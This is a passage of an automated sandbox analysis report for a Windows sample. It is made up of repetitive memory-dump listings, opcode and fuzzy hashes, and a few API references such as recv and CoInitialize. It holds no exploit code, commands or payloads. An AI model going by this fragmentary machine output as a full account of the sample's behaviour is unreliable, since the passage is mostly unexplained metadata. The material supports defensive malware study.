                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: bd40213ba34d509e65c07dacf86cf3bf2d068c547299947c5d2b659199687ef8
                                                                                                                • Instruction ID: 3cef7a2ad02ba1966db01c9d20407dbe1944fdba80bdf80b79f5a6d1eb806719
                                                                                                                • Opcode Fuzzy Hash: bd40213ba34d509e65c07dacf86cf3bf2d068c547299947c5d2b659199687ef8
                                                                                                                • Instruction Fuzzy Hash: 63C0803801160057FD1C453C505442432455A4F7173F40B58DC716F1E1DB32C44BD770
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00D5B3C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 7e9d7837872e72cca7b6e49f3881ab8191e147afc60f7ccc123d439e4e1efddb
                                                                                                                • Instruction ID: bc0efff46d37f3159c7f52bd2e1fe39f435ba1f8013ed03eed2426e452c0340b
                                                                                                                • Opcode Fuzzy Hash: 7e9d7837872e72cca7b6e49f3881ab8191e147afc60f7ccc123d439e4e1efddb
                                                                                                                • Instruction Fuzzy Hash: 3CB10670A10268DFEF28CF18C994BDEB7B5EF15305F5045D9E80A67281D775AA88CFA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c11b0ef308a4ddbd5a33efd43584a92d4193d7f15ab39f879c6a338c3fed8507
                                                                                                                • Instruction ID: 7aca070e8969be60c3fa2912d5be7681fb3197ae19704ec2c70f3e4ff3722195
                                                                                                                • Opcode Fuzzy Hash: c11b0ef308a4ddbd5a33efd43584a92d4193d7f15ab39f879c6a338c3fed8507
                                                                                                                • Instruction Fuzzy Hash: CF218B9B04C290ADDB02C462AA1FAF36F7AE59B3303308617F44BC94B3E255894B52B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b5d562f8b83d0732b90eeb28bc519e57c0ecd0c9f5fc6d3b6df8a2f8235c7e45
                                                                                                                • Instruction ID: 3f9e3afb0ac7d07cfd15de5b10376323b868bd32b82db463a4edff9bd3c13dd3
                                                                                                                • Opcode Fuzzy Hash: b5d562f8b83d0732b90eeb28bc519e57c0ecd0c9f5fc6d3b6df8a2f8235c7e45
                                                                                                                • Instruction Fuzzy Hash: F8216BAB04C150ADDB02C5969A1FAF77F7BE5CA6707308617F80BCA5A3E252890B51B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e9a47aabf4886d1941ad331ac114f84a4d63b2f58c325e81d874d93bca61316
                                                                                                                • Instruction ID: ff7879545184e83ea6c3cf438dc78666c4731227974048fe2d27ea7e366405a0
                                                                                                                • Opcode Fuzzy Hash: 0e9a47aabf4886d1941ad331ac114f84a4d63b2f58c325e81d874d93bca61316
                                                                                                                • Instruction Fuzzy Hash: 7A115CDB04C1506DDB02C196AA1F6F76F7BD6CA3307308617F40BCA5A3E255894F52B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a852f11df810dce55450a2cd0eb680c78de5f82c2fbd41a46f7875a48f8183e9
                                                                                                                • Instruction ID: 4d9a3fe27815b10e5caec3690a84089f4eef41580248ae836e7809c09e313da5
                                                                                                                • Opcode Fuzzy Hash: a852f11df810dce55450a2cd0eb680c78de5f82c2fbd41a46f7875a48f8183e9
                                                                                                                • Instruction Fuzzy Hash: 0001D6EB04C114BDE742C446AB1F9F76A7BE6DA3307308613F80FC6562D3964A4B6171
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 90059c3c1b94c3f2b3898f5dd38b6bcd106fc7b53def37ee86d3f5ceb3e5dbfd
                                                                                                                • Instruction ID: 1f33c04bd9970235dbea4a3734cc67f5c3f26198d6f42fb86d02890b1a06defd
                                                                                                                • Opcode Fuzzy Hash: 90059c3c1b94c3f2b3898f5dd38b6bcd106fc7b53def37ee86d3f5ceb3e5dbfd
                                                                                                                • Instruction Fuzzy Hash: 4D01B5EB00C150BDE701C5866B5A9F76A7BE5DA330730C517F80BD6562D3A54D4B2171
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a8b366ca1592c16aecc48c9772915d4c214de05c2f38b7ebd2a1c7547ae78a2f
                                                                                                                • Instruction ID: 290d818bd3a6a8ac8783bdfb206081356516850be1df5fe39d99aa192590377e
                                                                                                                • Opcode Fuzzy Hash: a8b366ca1592c16aecc48c9772915d4c214de05c2f38b7ebd2a1c7547ae78a2f
                                                                                                                • Instruction Fuzzy Hash: AE0149FB10C150AEE7018556255A9F67BBAA9C73307304437F846C7852D351491B6271
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 92463bd611d60a5f5e42f75f29b6b9ddc9cabafb8ec03bcc2995744100e3ce9a
                                                                                                                • Instruction ID: 952eb6cd33fb7be19d638476dee335d0cfb5e675e8e04d69d9200e124d16a46f
                                                                                                                • Opcode Fuzzy Hash: 92463bd611d60a5f5e42f75f29b6b9ddc9cabafb8ec03bcc2995744100e3ce9a
                                                                                                                • Instruction Fuzzy Hash: 53F021A700C150AED300851A3A5A8F6BB3AE9DA331330801BF44B8B522D3A55D4AA232
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cda05b82304b4157607d988215e084be75d11254a2286194869b75101a954a5f
                                                                                                                • Instruction ID: b0483ad2409adc410b8934a0a894a4ec57dec4e81c60074bf74679b88543c3bf
                                                                                                                • Opcode Fuzzy Hash: cda05b82304b4157607d988215e084be75d11254a2286194869b75101a954a5f
                                                                                                                • Instruction Fuzzy Hash: CDF059FB008060BD970185462A1A8F76B7FEAC5330B308413F80BC6422D7A14D0A6230
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 607828c99f3b5e35b1b2c7aabc811ec328b0c08871c7ca6064628907c3402881
                                                                                                                • Instruction ID: f0a682295765cea12b0cb4d426e6125a253da5d3c836883e2b633723885408fa
                                                                                                                • Opcode Fuzzy Hash: 607828c99f3b5e35b1b2c7aabc811ec328b0c08871c7ca6064628907c3402881
                                                                                                                • Instruction Fuzzy Hash: 0FF05CF704C0706DA300C59636299F7A7BED4C5230332451BF846C7053D7848C0E6131
                                                                                                                APIs
                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 00D5E10B
                                                                                                                • recv.WS2_32(?,?,00000008,00000000), ref: 00D5E140
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: recv
                                                                                                                • String ID:
                                                                                                                • API String ID: 1507349165-0
                                                                                                                • Opcode ID: 88a0dba1cbf391af2e371623f74179892aeabc76798dec1fcc25131a5f6d46e6
                                                                                                                • Instruction ID: d50b2987b9b5a60c4750a94b02df767a204a4239b1cd1fe7d4cd25161898b031
                                                                                                                • Opcode Fuzzy Hash: 88a0dba1cbf391af2e371623f74179892aeabc76798dec1fcc25131a5f6d46e6
                                                                                                                • Instruction Fuzzy Hash: F731D571A00348DFDB249B68CC81BEB7BACEB08724F040625ED15E73D1C674A948CBB0
                                                                                                                APIs
                                                                                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,00D6CF52,?,00000003,00000003,?,00D6CF87,?,?,?,00000003,00000003,?,00D6C4FD,00D52FB9,00000001), ref: 00D6CC03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Time$FilePreciseSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1802150274-0
                                                                                                                • Opcode ID: e7fe6e40bb4df33e81691a3f0d81a00645990cebb59769cb2cb7419b3b3aa4e7
                                                                                                                • Instruction ID: 28070b6a2e9016791429c34251b50491624c53b56224a6ce206615b8bcf475d3
                                                                                                                • Opcode Fuzzy Hash: e7fe6e40bb4df33e81691a3f0d81a00645990cebb59769cb2cb7419b3b3aa4e7
                                                                                                                • Instruction Fuzzy Hash: 1CD02232712638D3CA152B94FC089BCBB6C8B01B103091211ED0893220CA12AC005BF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
